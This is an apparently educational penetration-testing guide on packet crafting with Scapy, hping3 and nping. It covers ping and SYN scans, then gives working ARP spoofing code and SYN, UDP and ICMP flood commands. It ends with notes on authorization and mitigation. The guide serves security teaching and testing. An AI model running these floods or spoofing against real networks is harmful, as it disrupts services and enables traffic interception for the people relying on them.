Packet Crafting

Network Scanning and Attacks Using Packet Crafting

Packet crafting allows penetration testers and security professionals to create custom network packets to test the robustness of network defenses and identify vulnerabilities. Here's a comprehensive guide on conducting network scanning and attacks using packet crafting.

Tools for Packet Crafting

1. Scapy: A powerful Python library used for crafting and manipulating network packets.

2. Hping3: A command-line tool for crafting and analyzing TCP/IP packets.

3. Nping: Part of the Nmap suite, used for packet generation and response analysis.

4. Netcat: Known as the "Swiss Army knife" for networking, useful for crafting packets and network communication.

Network Scanning with Packet Crafting

Using Scapy

Installation:

sudo apt-get install python3-scapy

Basic Usage:

1. Import Scapy:

   from scapy.all import *

2. ICMP Ping Scan:

   ip = "192.168.1.1"
   packet = IP(dst=ip)/ICMP()
   response = sr1(packet, timeout=1)
   if response:
       print(f"{ip} is up")
   else:
       print(f"{ip} is down")

3. TCP SYN Scan:

   ip = "192.168.1.1"
   port = 80
   packet = IP(dst=ip)/TCP(dport=port, flags="S")
   response = sr1(packet, timeout=1)
   if response and response[TCP].flags == "SA":
       print(f"Port {port} is open")
   else:
       print(f"Port {port} is closed")

Using Hping3

Installation:

sudo apt-get install hping3

Basic Usage:

1. ICMP Ping:

   hping3 -1 192.168.1.1

2. TCP SYN Scan:

   hping3 -S 192.168.1.1 -p 80

3. UDP Scan:

   hping3 -2 192.168.1.1 -p 53

Using Nping

Installation:

sudo apt-get install nmap

Basic Usage:

1. ICMP Echo Request:

   nping --icmp 192.168.1.1

2. TCP SYN Scan:

   nping --tcp -p 80 192.168.1.1

Attacks Using Packet Crafting

Using Scapy

ARP Spoofing:

1. Send ARP Reply:

   target_ip = "192.168.1.10"
   spoof_ip = "192.168.1.1"
   target_mac = "aa:bb:cc:dd:ee:ff"
   packet = ARP(op=2, pdst=target_ip, psrc=spoof_ip, hwdst=target_mac)
   send(packet, verbose=0)

TCP SYN Flood:

1. Send SYN Packets in a Loop:

   target_ip = "192.168.1.1"
   target_port = 80
   while True:
       packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
       send(packet, verbose=0)

Using Hping3

TCP SYN Flood:

hping3 -S 192.168.1.1 -p 80 --flood

UDP Flood:

hping3 -2 192.168.1.1 -p 53 --flood

ICMP Flood:

hping3 -1 192.168.1.1 --flood

Ethical Considerations

• Authorization: Always ensure you have explicit permission from the network owner before conducting any scanning or attack simulations.

• Controlled Environment: Perform these activities in a controlled and isolated environment to prevent accidental damage or disruption.

• Responsible Disclosure: If you discover vulnerabilities, report them responsibly to the appropriate stakeholders with recommendations for mitigation.

Mitigation Tips

• Network Segmentation: Properly segment networks to limit the impact of potential attacks.

• Intrusion Detection/Prevention Systems: Deploy IDS/IPS to detect and prevent malicious packet crafting activities.

• Regular Audits: Conduct regular security audits to identify and remediate vulnerabilities.

• Strong Access Controls: Implement strong access controls and authentication mechanisms to protect network devices and systems.

By using these tools and techniques, penetration testers can effectively scan networks and simulate attacks to identify and address security weaknesses.